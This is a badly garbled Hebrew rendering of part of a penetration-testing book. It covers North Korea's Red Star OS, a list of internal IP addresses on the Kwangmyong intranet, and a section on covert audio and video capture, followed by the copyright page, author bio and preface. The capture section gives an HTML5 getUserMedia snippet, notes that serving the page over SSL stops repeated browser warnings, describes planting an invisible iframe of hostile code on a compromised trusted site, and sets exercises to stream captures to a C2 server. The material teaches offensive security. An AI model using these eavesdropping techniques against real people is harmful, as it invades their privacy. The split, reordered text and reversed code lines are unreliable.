‫) בזמן כתי בת שורות א לו( ש ל מער כת ההפע לה אנדרואיד ש שונתה להיות מעי קה כמו‬
‫מער כת ההפע לה ה כו כ ב האדום‪ .‬מיותר לציין שאין גי שה לאינ טרנ ט‪.‬‬
‫שגוי‪.‬בור‬
‫יד ע‬‫בר‪,‬‬
‫הואסתמצו‬
‫זה‪ ,‬מ‬
‫‪WiFi.‬יד‪.‬‬
‫מתאםאנדרוא‬
‫שאיןגםלומ כ שיר‬
‫שהוא‬
‫טוען‬
‫‪Samjiyon‬‬
‫‪( ),‬אך היצרן‬
‫חומה‪,‬‬
‫קפת ב שם‬
‫המושמי"‬
‫ינהט "ר‬
‫ירשתטאלגב ל‬
‫לג‬
‫גם כומלכ ש‬
‫‪3G‬וי‬
‫יש‬
‫חומרת ‪ WiFi‬קיימת אך הו ש בתה ו כ ל מי שי ש לו קצתידע באנדרואידי כו ל להפעי ל אותה‪.‬‬
‫‪-Samjiyon‬ההוא גם‪ ,‬ע ל פי הת ק שורת המ קומית‪ ,‬המצאה צפון קוריאנית‪ ,‬ו בהת ח ש ב ב כמות‬
‫העצומה ש ל טא ב ל טים סיניים זו לים הזמינים‪ ,‬זה הת ברר קצתיותר מ סו בך לאתר בדיו ק מה‬
‫ה חומרה‪ .‬עם זאת‪ ,‬ניתו ח ק טן ש ל ק בצי מער כת האנדרואיד ש ל המ כ שיר מ סגיר זאת‪ ,‬כפי שמוצג‬
‫באיור ‪9.20.‬‬
‫איור ‪ 9.20:‬מידע ע ל מ כ שיר טא ב ל ט ‪Yecon.‬‬
‫זהו טא ב ל ט ‪ Yecon 75‬מתוצרת ‪ Alps‬בהונג קונג‪ ,‬מותאם אי שית ע בור הצר כן הצפון קוריאני‪.‬‬
‫"הגן המו קף חומה"‪ :‬האינ טראנ ט ש ל קוונגמיונג‬

‫מע טי ח סיתידוע ע ל האינ טראנ ט הצפון קוריאני‪ .‬זוהי ר שת מ בו ס סת ‪IP‬המ ק שרת בין אתרים‬
‫שונים בתוך המדינה‪ ,‬כגון אוני בר סי טאות וארגונים ממ ש לתיים‪ .‬הגי שה חופ שית לאזר חי צפון‬
‫קוריאה ) בהנ חה שהםי כו לים להר שות לעצמם את הציוד כדי לג שת א ליו(‪ ,‬שע בורם היא מת כוונת‬
‫ל ספ ק את כ ל ה חד שות והמידע שהם צרי כים )או ליתר דיו ק להג בי ל אותם למה שהממ ש לה רוצה‬
‫שהםיראו‪ ,‬ת לוי נ קודת מ ב ט(‪ .‬בהת ב ס ס ע ל המידע הזמין‪ ,‬האינ טראנ ט תואם ל כתו בת ‪ IP‬פנימית‪,‬‬
‫אם כי באופן לא ע ק בי‪ .‬מ ספר פורמ טים שונים ש ל ‪IP‬נמצאים ב שימו ש‪ ,‬כפי שניתן לראות בר שימה‬
‫זו ש ל מאר חים הידועים כ קיימים‪:‬‬
‫קוואנגמיונג ‪ http://10.41.1.2‬סו כנות מידע למדע‬ ‫מֶ ר ּ ָכ ִזי‬

‫ו ט כנו לוגיה‬
‫)אז ליה( ‪http://10.76.12.2‬‬

‫)מו בי ל דרך( ‪http://10.208.0.34‬‬
‫‪Naenara http://10.76.1.11‬‬ ‫מידע ע ל נאנרה‬

‫נמ סאן ‪ http://192.168.1.101‬בית‬ ‫מ ח קר העם הגדו ל‬
‫‪)Risang‬אידיא לי( ‪http://10.15.15.8‬‬ ‫אוני בר סי טת קים צ'א ק‬

‫ש ל מדע ו ט כנו לוגיה‬
‫א חים ) בו קר( ‪http://172.16.34.100‬‬
‫‪ 21‬מידע ‪ 21 http://10.21.1.22‬מר כז‬ ‫פיונגיאנג‬

‫אינפורמ טי קה‬
‫מר כז הירידים הא ל ק טרוני ש ל מדע ו ט כנו לוגיה‬

‫‪Three Revolution‬‬ ‫מר כז הירידים‬
‫‪http://192.168.10.10‬‬ ‫‪3‬‬
‫‪10.205.1.5 Mining University‬‬ ‫‪ Chongjin‬מת כת ו‬

‫‪Gidung http://‬‬
‫‪Manbang http://10.61.61.3‬‬ ‫מר כז קוריאני‬

‫ט לוויזיה‬
‫המאה ה חד שה ‪http://10.41.1.10‬‬ ‫)‪(CIAST‬‬
‫‪Bangyong http://10.41.50.3‬‬
‫‪Raeil http://10.66.1.3‬‬
‫המצאה ‪http://10.41.50.9‬‬
‫‪)Klacksae‬נ קר( ‪http://10.240.100.11‬‬

‫מר כז המידע ש ל אוני בר סי טת קים אי ל סונג‬
‫‪Hanmaum (One Mind) http://10.76.1.20‬‬ ‫או סן‬

‫מר כז מידע‬
‫כו כ ב ה קו ט ב הצפוני ‪http://10.76.1.2‬‬ ‫הר שת ה לאומית‬

‫מר כז מידע‬
‫‪-‬‬
‫יערות קוריאה ‪http://10.76.1.18‬‬
‫‪Jihyang http://10.208.1.2‬‬ ‫האמונג כימי ק ל‬

‫אוני בר סי טת‬
‫‪Rungna http://172.16.4.200‬‬
‫‪Rungna Progam Center‬‬
‫טי סה ‪http://10.15.15.5‬‬ ‫אוני בר סי טת קים צ'א ק ש ל‬

‫מדע ו ט כנו לוגיה‬
‫‪Rodong Sinmun http://10.10.3.100‬‬ ‫רודונג סינמון‬
‫חיים ‪http://10.65.3.2‬‬ ‫מידע מדע רפואי‬

‫או קיינו ס ‪http://10.17.1.5‬ת ח בורה‬ ‫מ שרד הי ב שה והים‬
‫‪Cholima http://172.16.11.23‬‬ ‫מידע מר כזי‬

‫ו סו כנות ת ק שורת‬
‫הייתי מתאר לעצמי ש ט ב לאות הניתו ב הן ב לגן מו ח ל ט‪.‬‬
‫כפי שאמרתי‪ ,‬א שמ ח להי כנ ס לד בר הזה ו למפות אותו כמו שצריך‪ .‬קיוויתי למצוא לפ חות ספ ק א חד‬
‫ב טוו ח ה ט לפונים הנגי שים כ לפי חוץ שיעורר גי שה כ ל שהי א ליו‪ ,‬א ב ל זו הייתה מ שא לת ל ב‪ .‬אין גי שה‬
‫לאינ טרנ ט זמינה מה קוואנגמיונג‪ ,‬מה שיהפוך את אופיו למעורפ ל במ קצת‪.‬‬
‫י ש לציין ב ש ל ב זה שהעם הצפון קוריאני אינו טיפ ש‪ ,‬ו למרות הזרם האינ סופי ש ל ש טויות תעמו לה‬
‫שהם נתונים להם‪ ,‬ליותר ויותר מהםי ש גי שה לאינ טרנ ט דרך ט לפונים ב שו ק ה ש חור שמ קורם ב סין‪.‬‬
‫זהו חי בור ט כני ו לא פו לי טי‪ ,‬א ב ל לא ס ביר שמ ש טר כזהי שרוד לאורך זמן ברגע שהגי שה לאינ טרנ ט‬
‫תהיה רוויהיותר ויותר‪.‬‬
‫האזנת אודיו ווידאו‬

‫ה סעיף הא חרון הזה אינו מעמי ק מ ספי ק כדי להיות מ סווג כפרי סת מ טען או ניהו ל ‪C2‬‬
‫בפני עצמו‪ ,‬א ב ל מ כיוון שדי ברנו קצת ע ל מ כ שירי אנדרואיד בפר ק זה‪ ,‬רציתי ל כ לו ל‬
‫אותו‪ .‬כ שדר להת קפה‪ ,‬הוא בת חי לתו ור קיהפוך לר לוונ טייותר‪ .‬בהנ חה ש סו כן ‪C2‬‬
‫נפר ס בהצ ל חה לנ קודת קצהיעד‪ ,‬ל כידת אודיו ווידאו היא טריוויא לית וניתן לה שיגה‬
‫באמצעות מ ספר ממ ש קי ‪ API‬מ קוריים או ש ל צד ש לי שי‪ .‬עם זאת‪ ,‬כא שר תו קפים‬
‫מ כ שירים ניידים או טא ב ל טים‪ ,‬זהי כו ל להיות בעייתייותר‪ .‬בה ח ל ט ניתן ליצור אפ לי קציות‬
‫ש כא שר הן מות קנות ומ ק ב לות הר שאות מ סוימות‪ ,‬ניתן להפעי ל אותן מר חו ק באמצעות‬
‫הודעות ד חיפה ו להפעי ל את המי קרופון והמצ למה ו להזרים את התו כן ש להן‪.‬‬
‫עם זאת‪ ,‬בין אם הם מפת חים ע בור ‪iOS‬או אנדרואיד‪ ,‬אפ לי קציות צרי כות לע בור תה ליך‬
‫בדי קה לפני שהן מותרות ‪ -App Store‬באו ‪ -Google Play,‬ב ו ס ביר להני ח שה שימו ש‬
‫ב‪ sIPA-‬מ סוימים באפ לי קציות ש ברור שאינן ז קו קות להםייד חה במה לך תה ליך זה‪. .‬‬
‫לדוגמה‪ ,‬בתוך מער כת ההפע לה ‪iOS‬י ש ‪ API‬ב שם ‪ PushKit‬שמ כי ל שתי צורות ש ל‬
‫התראות כא לה ‪-‬א חת ס טנדר טית וא חת ליי שומי ‪VoIP.‬זה הא חרון נ חוץ כדי לאפ שר‬
‫מר חו ק את הגדרת ה שי חה ל לא צורך ל שמור ע ל חי בור ק בוע ל שרת ‪-VoIP,‬ה שירו קן‬
‫את ה סו ל לה במהירות‪-API .‬הה ספציפי הזהיהיה מו ש לם ע בור הצר כים ש לנו‪ ,‬א ב ל‬
‫ה שימו ש בפונ קציונ ליות ש לו באפ לי קציה ש כמו בן לא מיועדת ‪ -VoIP‬ל בה ח ל טייד חה‬
‫במה לך תה ליך ה בדי קה‪.‬‬
‫עם זאת‪ ,‬עם ‪HTML5,‬י ש לנו גי שה למ ספר קריאות ‪ API‬מעניינות שניתן לה שתמ ש‬
‫בהן כדי לג שת גם למי קרופון וגם למצ למה‪ .‬היתרונות ש ל גי שה זו הם שניתן פ שו ט‬
‫לה כני ס את קוד התו כנה הזדונית לדף אינ טרנ ט והוא חוצה פ ל טפורמות‪ .‬ההת קפה‬
‫תע בוד גם ב ט לפון אנדרואיד כמו בדפדפן פיירפו ק ס הפוע ל ‪ -Windows.‬בה חי סרון הוא‬
‫שמ כיוון ש‪ 5LMTH-‬הוא עדיין ת קן מתפת ח‪ ,‬לא כ ל קריאות ‪-API‬הנתמ כות ב כ ל‬
‫הדפדפנים‪ .‬זה כמו בןי שתפר ו‪ 5LMTH-‬כנראהי ספ ק דר כים מעניינות להת קפה בעתיד‪.‬‬
‫ה קוד ה בא הוא הדרך הפ שו טה ביותר להדגים את ה שימו ש ב‬

‫‪ HTML5‬בהזרמת מדיה‪:‬‬
‫;‪|| navigator.mozGetUserMedia || navigator.msGetUserMedia‬‬
‫‪= navigator.getUserMedia || navigator.webkitGetUserMedia‬‬
‫‪navigator.getUserMedia‬‬
‫;)'‪var video = document.querySelector('video‬‬
‫{ )‪if (navigator.getUserMedia‬‬
‫‪errorCallback); } else { video.src = 'somevideo.webm'; //‬‬

‫‪function(stream) { video.src = window.URL.createObjectURL(stream); },‬‬
‫‪ navigator.getUserMedia({audio: true, video: true},‬ל סגת‪.‬‬
‫}‬
‫קוד זה הוא רמז והמ ח שה וידרו ש מ ח ש בה מו קדמת מצידך כיצד ל ש ל ב זאת בפתרון‬
‫‪ C2‬ש לך‪.‬‬
‫רו ב הדפדפנים ה קוראים ל‪getUserMedia API -‬יפעי לו אזהרה למ שתמ ש‪.‬‬
‫עם זאת‪ ,‬אם תע ביר את דף האינ טרנ ט באמצעות ‪SSL,‬זהי קרה ר ק פעם א חת ו בעתיד‬
‫תינתן הר שאה‪.‬י ש מע ט קוהרנ טיות וה ס כמה לג בי הא ב ט חה בת קן ‪ HTML5‬כפי שהוא‬
‫כעת‪.‬‬
‫ה חו כמה היא כמו בן לגרום למ שתמ ש ל ב קר בדף האינ טרנ ט ש לך‪ ,‬מה שמ חזיר אותנו‬
‫לת חום ההנד סה ה ח ברתית‪.‬י ש שני כיווני ת קיפה‪ .‬גי שה א חת )וזו העדיפה( היא הת קפת‬
‫בור מים‪ .‬כ לומר‪ ,‬אנו מ טמיעים את ה קוד הזדוני ש לנו ‪ -iFrame‬ב ב לתי נראה ש ל אתר‬
‫שפגענו בו בע בר ו שהוא מהימן ע לידי היעד‪ .‬היתרונות ש ל גי שה זו הם כפו לים‪ .‬הרא שון‬
‫הוא אמון‪:‬י ש סי כוי ג בוהיותר שהמ טרה ת ק ב ל הודעות ה ק שורות לא ב ט חה‪ .‬ה שני הוא‬
‫התמדה‪ :‬ההת קפה הזו פוע לת ר ק כ ל עוד הדפדפן לא סגור‪ .‬ס ביר להני ח שאתר מהימן‬
‫יי שאר פתו ח גם אם הוא בר קע והמ טרה כ בר לא מעור בת בו באופן פעי ל‪.‬‬
‫ניתן להזרי ק ‪ iFrame‬ב לתי נראה באופן ה בא‪:‬‬

‫>"‪height="400" frameborder="0" src="hostile_code.html" seamless="seamless‬‬
‫"‪<iframe width="700" scrolling="no‬‬
‫שימו ל ב שהתג ה ב לתי ח ל ק הוא עוד מוזרות ‪HTML5.‬אני מ שתמ ש בו כאן כי הוא‬
‫נתמך ת חת ‪Chrome/Android.‬‬
‫גי שה א חרת היא כמע ט הפוך מזה‪ .‬אתה רו שם שם דומיין שדומה למ טרה‪ ,‬טוען את‬
‫האתר המ קורי ויוצר ‪ iFrame‬לצד ה קוד העוין‪.‬‬
‫י שנן דר כים א חרות לתפו ס אודיו‪/‬וידאו מהמ טרה‪Adobe Flash .‬היא אפ שרות כזו‪,‬‬
‫א ב ל זו ט כנו לוגיה שהו ל כת בדר כו ש ל הדודו‪ ,‬אז לא הייתי ממ ליץ ע ליה‪.‬‬
‫סי כום‬
‫י ש כאן אירוניה מרה מ סוימת; מער כות ההפע לה ה שונות ש ל לינו ק ס נועדו ל קדם‬
‫פתי חות ו שיתוף פעו לה בפיתו ח תו כנה‪ .‬לראות את לינו ק ס הופ כת ל כ לי ש ל ב קרת‬
‫מדינה זה די לא נעים‪.‬‬
‫הפר ק הא חרון הזה נועד להיות מ שהו קצת שונה מהפורמ ט ש בו ה שתמ שתי ב כ ל‬
‫ה ספר הזה‪ ,‬לא ר ק בג ל ל שרציתי להמ חי ש כמה ט כני קות אי סוף מודיעין ב קוד פתו ח‪,‬‬
‫א לא גם בג ל ל שרציתי ל סיים בנימה א חרת‪ ,‬ב קצ ב שונה‪.‬י שנן מ ספר מ ס קנות שאתה‬
‫י כו ל ל ק חת מהפר ק הזה‪ ,‬או לי ה ברורה ביותר היא שאם אתה קורא את זה‪ ,‬ס ביר להני ח‬
‫שאתה אדם חופ שי ש חי ב ח ברה חופ שית ו ס ביר להני ח שאתה לו ק ח את זה כמו בן‬
‫מא ליו‪ .‬אםי ש ל ק ח א חד שאפ שר ל למוד מה ספר הזה ב כ ל לותו‪ ,‬זה שה ט כנו לוגיה היא‬
‫חר ב פיפיות עם ה ש ל כות שונות מאוד ע ל ה ח ברה‪ ,‬ת לוי מי או חז בה‪.‬‬
‫‪1.‬הורד את ‪ Red Star Linux Desktop‬ו ש ח ק איתו‪ .‬אי לו עוד מ ס קנות או תצפיות‬
‫אתהי כו ל לה סי ק לג בי ההג ב לות והני טור שהוא מ טי ל ע ל המ שתמ שים? צפון קוריאה‬
‫ר חו קה מ להיות המדינה הי חידה שפית חה מער כת הפע לה מעי קה כדי ל ש לו ט‬
‫באזר חיה‪ .‬דוגמה נו ספת היא נו בה‪ ,‬ב ח סות ממ ש לת קו בה‪ ,‬א ב לי ש א חרות‪ .‬ה שתמ ש‬
‫במה ש למדת בפר ק זה‪ ,‬ר כו ש א חד והפרד אותו‪.‬‬
‫‪ 2.‬בצע ת קיפה שתופ ס אודיו ו‪/‬או וידאו ממ כ שיר ל קו ח נייד‪ ,‬טא ב ל ט או שו ל חן ע בודה‪.‬‬
‫ק חו ב ח ש בון ט כנו לוגיות שנגענו בהן בע בר‪ ,‬כמו ‪Adobe AIR‬או ‪ Java JWS.‬ש קו ל כיצד‬
‫י ש להזרים נתונים ב חזרה ל שרת ‪ C2‬ש לך‪ .‬אם אודיו מייר ט ב טוו ח הארוך‪ ,‬אי לו ט כני קות‬
‫או טומ טיות ניתן ליי שם ע ל הנתונים כדי להפוך את הניתו ח ה ח כם לאו טומ טייותר?‬
‫‪ 3.‬ר שימה מ לאה ש ל דפדפנים ניידים שתומ כים באי לו פונ קציות ‪HTML5‬ניתן למצוא‬
‫ב כתו בת ‪ http://mobilehtml5.org/.‬מתוך ר שימה זו‪ ,‬ש קו ל אמצעים א חרים‬
‫להת קפה פו טנציא לית נגד מ כ שירים ניידים‪ ,‬בין אם זה פ שרה מר חו ק‪ ,‬אי סוף מודיעין‬
‫או הת קפות מניעת שירות‪.‬‬
& Sons, Inc. ‫ פריצה לר שתות המאו ב ט חות ביותר בעו לם פור סם ע לידי‬:‫בדי קת חדירה מת קדמת‬
John Wiley
10475 Crosspoint Boulevard Indianapolis, IN 46256 www.wiley.com
John Wiley & Sons, Inc., Indianapolis, Indiana ‫ © מאת‬2017 ‫ז כויותיוצרים‬

‫פור סם במ ק בי ל ב קנדה‬
‫‪ISBN: 978-1-119-36768-0‬‬
‫)‪ISBN: 978-1-119-36771-0 (ebk‬‬
‫)‪ISBN: 978-1-119-36766-6 (ebk‬‬
‫אין ל ש כפ ל‪ ,‬לא ח סן במער כת א חזור שום ח ל ק מפר סום זה או ל שדר ב כ ל צורה או אמצעי‪ ,‬א ל ק טרוני‪ ,‬מ כני‪ ,‬צי לום‪,‬‬
‫ה ק ל טה‪ ,‬סרי קה או א חר‪ ,‬למע ט כפי שמותר לפי סעיפים ‪107‬או ‪ 108‬ש ל ז כויות היוצרים ש ל ארצות ה ברית מ שנת‬
‫‪ 1976‬לפעו ל‪ ,‬ל לא אי שור מרא ש ו ב כת ב ש ל המפר סם‪ ,‬או אי שור באמצעות ת ש לום האגרה המתאימה ל כ ל עות ק‬
‫למר כז אי שור ז כויות היוצרים‪ 222 Rosewood Drive, Danvers, MA 01923, (978) 750-8400, ,‬פ ק ס ‪- 8600.‬‬
‫‪ (978) 646‬ב ק שות למפר סם ל ק ב לת ר שותי ש להפנות למ ח ל קת ההר שאות‪NJ 07030, (201) 748-6011, ,‬‬
‫‪ John Wiley & Sons, Inc., 111 River Street, Hoboken,‬פ ק ס ‪(201) 748-6008,‬או מ קוון ב כתו בת ‪permissions.‬‬
‫‪http://www.wiley.com/go/‬‬
‫הג ב לת א חריות‪/‬ה סתייגות מא חריות‪ :‬המוציא לאור והמ ח בר אינם מציגים מצגים או הת חיי בויות בי ח ס לדיו ק או ש למות‬
‫התו כן ש ל ע בודה זו ומתנערים במפור ש מ כ ל הא חריות‪ ,‬לר בות ל לא הג ב לה א חריות לג בי התאמה למ טרה מ סוימת‪.‬‬
‫אין ליצור או להר חי ב א חריות ע לידי מ כירות או חומרי קידום מ כירות‪.‬יית כן שהעצות והא ס טר טגיות המופיעות כאן‬
‫לאיתאימו ל כ ל מצ ב‪ .‬ע בודה זו נמ כרת מתוך ה בנה שהמוציא לאור אינו עו ס ק במתן שירותים מ שפ טיים‪ ,‬ח ש בונאיים‬
‫או מ קצועיים א חרים‪ .‬אם נדר ש סיוע מ קצועי‪,‬י ש לפנות ל שירותיו ש ל אי ש מ קצוע מו כ שר‪ .‬לא המוציא לאור ו לא‬
‫המ ח בריהיו א חראים לנז קים הנו בעים מ כך‪ .‬העו בדה שארגון או אתר אינ טרנ ט מ כונה בע בודה זו צי טו ט ו‪/‬או מ קור‬
‫פו טנציא לי למידע נו סף‪ ,‬אין פירו שו שה כות ב או המפר סם מא שרים את המידע שהארגון או האתר ע שויים ל ספ ק או‬
‫המ לצות שהוא ע שוי להציע‪.‬יתרה מ כך‪ ,‬ע ל ה קוראים להיות מודעים ל כך שאתרי אינ טרנ ט המופיעים ביצירה זו ע שויים‬
‫לה שתנות או נע למו בין מועד כתי בתיצירה זו ל בין מועד קריאתה‪.‬‬
‫למידע כ ל לי ע ל המוצרים וה שירותים הא חרים ש לנו‪ ,‬אנא צור ק שר עם מ ח ל קת שירות ה ל קו חות ש לנו בתוך ארצות‬
‫ה ברית ב ט לפון ‪ (877) 762-2974,‬מ חוץ לארה" ב ב ט לפון ‪(317) 572-3993‬או בפ ק ס ‪(317) 572-4002.‬‬
‫ווי לי מפר סמת במגוון פורמ טים מודפ סים וא ל ק טרוניים ו לפי הדפ סה לפי דרי שה‪.‬יית כן ש ח ל ק מה חומרים הנ כ ל לים‬
‫בגר סאות המודפ סות ה ס טנדר טיות ש ל ספר זה לאיי כ ל ל ב ספרים א ל ק טרוניים או בהדפ סה לפי דרי שה‪ .‬אם ספר זה‬
‫מתיי ח ס למדיה כגון ‪CD‬או ‪ DVD‬שאינה כ לו לה בגר סה שר כ שת‪ ,‬תו כ ל להוריד חומר זה ב כתו בת‬
‫‪ http://booksupport.wiley.com.‬למידע נו סף ע ל מוצרי ‪ Wiley,‬ב קר ב כתו בת ‪www.wiley.com.‬‬
‫מ ספר ב קרת ספריית ה קונגר ס‪ 2017931255 :‬סימנים מ ס חריים‪ Wiley :‬וה לוגו ש ל ‪Wiley‬הם סימנים מ ס חריים או‬
‫סימנים מ ס חריים ר שומים ש ל ‪ John Wiley & Sons, Inc.‬ו‪/‬או ה ח ברות ה ק שורות לה‪ ,‬בארצות ה ברית ו במדינות‬
‫א חרות‪ ,‬ואין לה שתמ ש בהם ל לא אי שור ב כת ב‪ .‬כ ל שאר ה סימנים המ ס חריים הם ר כו שם ש ל בע ליהם בהתאמה‪Inc. .‬‬
‫‪John Wiley & Sons,‬אינה ק שורה למוצר או ל ספ ק כ ל שהו המוז כרים ב ספר זה‪.‬‬
‫ע בודה זו מו קד שת לז כרו ש ל סר טרי פראצ' ט‪ OBE (1948–2015), ,‬ע ל ש לימד אותי‬

‫קומדיה ו סא טירה וע ל ה חו כמה לדעת את הה בד ל‪.‬‬
‫"האם אינךיודע שאדם לא מת בעוד שמו נאמר?"‬
‫‪-‬הו לך לדואר‬
‫ע ל ה סופר‬
‫וי ל א ל סופ תמיד אה ב לפר ק ד ברים‪ .‬לפעמים הוא הצ לי ח ל ח בר אותם שו ב‪ .‬הוא נדד‬
‫ל בדי קות חדירה כמו ש ח ל ק מהאנ שים מ שו ט טים ל ברים )עוד פעי לות ש קרו בה ל ל בו(‪.‬‬
‫מפג ש מ קרי עם אדם בע ל דעות דומות ב‪ Stadscafe Zaltbommel t'-‬ב‪ 9991-‬הו בי ל‬
‫ל כך שהוא התפ טר מ חוזה פיתו ח התו כנה ש לו ב‪ MBI-‬וה קים את ה ח ברה הרא שונה‬
‫ש לו‪ ,‬ב שם ‪ Tigerteam Security NV,‬שמ סי בות שא בדו בזמן התאגדה ב קור סאו‪ .‬לפ חות‬
‫כ כה הוא זו כר את זה‪.‬‬
‫כמע ט ‪ 20‬שנה מאו חריותר‪ ,‬הוא עדיין שו בר ד ברים‪ ,‬עם הה בד ל ה ח שו ב ש כמה‬

‫מה ח ברות היו קרתיות בעו לם מ ש למות לו כדי לע שות זאת‪.‬‬
‫הוא חי בהו לנד עם א שתו ועם מאגר גדו ל ש ל חתו לים‪ ,‬כ ל בים‪ ,‬תרנגו לות ו קרפד ב שם‬
‫מ ל קו לם‪.‬‬
‫"אנ חנו עו בדים ב חו שך ‪-‬אנ חנו עו שים מה שאנ חנוי כו לים ‪-‬אנ חנו נותנים את מה שי ש לנו‪.‬‬
‫ה ספ ק ש לנו הוא הת שו קה ש לנו‪ ,‬והת שו קה ש לנו היא המ שימה ש לנו‪ .‬ה שאר זה ה טירוף‬
‫ש ל האמנות"‪.‬‬
‫‪-‬הנרי ג'יימ ס‬
‫ע ל העורך ה ט כני‬
‫א ליא ס ב כא לני הוא מת כנת מ ח ש בים ומהנד ס לא חור בתו כנה כ בריותר מ‪ 41-‬שנים‪.‬‬
‫א ליא ס הוא גם מ ח ברם המ שותף ש ל שני ספרים שיצאו לאור ע לידי ‪Engineering‬‬
‫‪ Wiley, Practical Reverse‬ו‪ The Antivirus Hacker's Handbook, -‬והמ ח בר ש ל‬
‫‪Batchography: The Art of Batch Files Programming.‬הוא ע בד עם ט כנו לוגיות‬
‫ו שפות ת כנות שונות כמו ת כנות אינ טרנ ט‪ ,‬ת כנות מ סדי נתונים ות כנות מנה לי הת קנים‬
‫ש ל ‪)Windows‬מ טעני את חו ל ומער כות הפע לה מינימ ליות(‪ ,‬ו כת ב ‪ TEN.‬ו קוד מנוה ל‪,‬‬
‫כת ב ס קריפ טים‪ ,‬העריך הגנות תו כנה ו כת ב הנד סה לא חור כ לי א ב ט חה שו ל חניים‪.‬‬
‫נ קודות ז כות‬
‫עורך פרוי ק טים‬
‫אדאו בי או בי טו ל טון‬
‫עורך ט כני‬
‫א ליא ס ב כא לני‬
‫עורך הפ קה‬
‫בארת' קומאר רג'א ס קארן‬
‫עורך העת קות‬

‫קזיה אנד ס לי‬
‫מנה ל פיתו ח והר כ בת תו כן‬
‫מרי בת' וויי קפי לד‬
‫מנה לייצור‬
‫קת לין וי סור‬
‫מנה ל שיוו ק‬
‫קארי שרי ל‬
‫מנה ל ט כנו לוגיה וא ס טר טגיה מ קצועיים‬

‫בארי פרו ט‬
‫מנה ל ע ס קים‬
‫איימי קני ס‬
‫עורך רא שי‬
‫ג'ים מינא ט ל‬
‫ר כז פרוי ק ט‪ ,‬כי סוי‬
‫ברנ ט סא באג'‬
‫מַ ִגיהַ‬
‫ננ סי ב ל‬
‫פת חָן‬
‫מַ ְ‬
‫ג'ונה ואנהוז דינ סה‬

‫מעצ ב הע טיפה‬
‫ווי לי‬
zlisjak/istock.com; ‫ © כר טי ס‬Ejla/istock.com; ‫ת ב לי ט תמונת שער‬
© hudiemm/istock.com ‫© קצוות קרועים‬
‫תודות הר בהיותר מדי מ כדי למנות )והםיודעים מי הם(‪ ,‬א ב ל תודה‬

‫מיו חדת ל טים ו קור טני ש ב לעדיהם הע בודה הזו לא הייתה אפ שרית‬
‫במת כונתה הנו כ חית; ד קרי דייוי ס‪ ,‬ע ל היותו המידה ש בה מודדים‬
‫את ה שאר; ‪ GCHQ,‬ע ל ההצעות המועי לות ש להם; וא חרון ח בי ב‪,‬‬
‫גארי מ קגאת'‪ ,‬א חד המוזי קאים ה כי לא מוער כים בעידן ש לנו‪.‬‬
‫כמו כן‪ ,‬תודה ל כ ל בוד ק ע ט‪ ,‬הא קר ואוונג לי ס ט א ב ט חה שעמ לתי איתו לאורך ה שנים‪.‬‬
‫אתה ה ספר הזה‪.‬‬
‫קד מָ ה‬
‫הַ ָ‬
‫מאז ש באתי במגע רא שון עם מ ח ש בים‪ ,‬הא ב ט חה )או חו סר ה בי ט חון אם תרצו( ש ל‬
‫המער כות המאוד חז קות ה ל לו סי קרנה אותי‪ .‬כ שגרתי בהו לנד‪ ,‬התמז ל מז לי לה שתמ ש‬
‫במער כת פי ליפ ס ‪ P9200‬ש ל האוני בר סי טה ה ט כנית איינדהו בן ע לידי חיוג א ליה‬
‫באמצעות מודם ‪ 300‬באוד כ ש למדתי בתי כון כדי ל למוד ת כנות ‪ -ALGOL 60.‬ב מ ח ש בים‬
‫אי שיים כמע ט ו לא היו קיימים אז‪ .‬זמן ומער כות מ ח ש ב כמו זה עו לות הון ק טן‪ .‬ה שימו ש‬
‫במודם כדי להת ח בר למער כת שתו כ ל לת כנת לפתור הר בה בעיות חי שו ביות כ בר היה‬
‫מ שהו ק סום‪ ,‬א ב ל ה שגת גי שה למ כונה עצמה הפ כה למ סע חיפו ש‪.‬‬
‫מ כיוון שהוא היה ממו קם ב קמפו ס ש ל האוני בר סי טה‪ ,‬זה לא היה כ ל כך בעייתי‪ .‬באותה‬
‫ת קופה‪ ,‬הא ב ט חה לא הייתה באמת בעיה גדו לה‪ ,‬ו כ ל מה שצריך היה להי כנ ס למ קום‬
‫כמ לומד צעיר המ ב ק ש סיור במת קן‪.‬‬
‫שם למדתי שה‪ 0029P-‬הוא ר ק "מיני מ ח ש ב ק טן"‪ .‬הע ס קה האמיתית הייתה המיינפריים‬
‫ש ל ‪Burroughs B7700.‬נדר שו קצת ח ט טנות כדי למצוא את מ ספר ה חיוג למער כת‬
‫ההיא‪ ,‬והר בה ש כנועים כדי ל ק ב ל ח ש בון במער כת הזו‪ ,‬א ב ל ב סופו ש ל ד בר הצ ל חתי‪.‬‬
‫לא פרצתי למער כת באותו זמן‪ ,‬א ב ל הנד סה ח ברתית )הי כו לת ל ספר סיפור מ ספי ק‬
‫מ ש כנע כדי לז כות באמון ו‪/‬או מידע( התג לתה כת כונה בע לת ערך ר ב‪.‬‬
‫בזמן ש למדתי מדעי המ ח שו ב‪ ,‬ב סופו ש ל ד בר נא לצנו לה שתמ ש במ ח ש בי ‪Prime.‬‬

‫הר שו לי ר ק לציין שא ב ט חת המ ח ש ב באותה ת קופה לא נ ח ש בה ח שו בה‪ .‬מ ספר ה באגים‬
‫במער כת ההפע לה )‪(PrimeOS‬היה ר ב‪ ,‬ואפי לו תי קונים ל בעיות א ב ט חה ש ח שפנוי כי לו‬
‫באגי א ב ט חה חד שים‪ .‬באותה ת קופה א ב ט חת מידע ממ ש מ ש כה את ת שומת לי בי ומאז‬
‫היא לא דע כה‪ .‬רגע לפני סיום ה לימודים‪ ,‬הת ח לתי לע בוד ב ח ברה ק טנה ב שם‬
‫‪ Positronika,‬לפיתו ח מער כות לתע שיית הגרעין‪ ,‬ה ח ל מדו סימ טר כי ס ק טן )מ בו ס ס ע ל‬
‫מע בד )‪ 6502‬ועד למער כות מדידה או טומ טיות גדו לות‪ .‬הם ה שתמ שו במער כות ‪PDP-11‬‬
‫למו טות ד ל ק לא חר ש שימ שו ב כור גרעיני‪ .‬לא ר ק למדתי את ח שי בות ה ב טי חות‪ ,‬א לא גם‬
‫למדתי איך ל כתו ב קוד מאו ב ט ח למ ח ש ב‪ .‬פ שו ט לאי כו לת לה סת כן ב שגרות ה טיפו ל‬
‫במו טות ו להפי ל חומר רדיוא ק טי בי מאוד‪ .‬זהי כו ל להיות ק ט לני‪.‬‬
‫ב‪ 9891-‬באתי במגע עם הוצאה מ חתרתית ו לא ברורה ב שם ‪ Hack-Tic,‬שהיה מה‬

‫שנ קרא מגזין הא קרים שפור סם באופן לא סדיר‪ .‬זה פת ח לי עו לם חד ש לגמרי‪ .‬פתאום‬
‫שמתי ל ב שי ש עוד הר בה‬
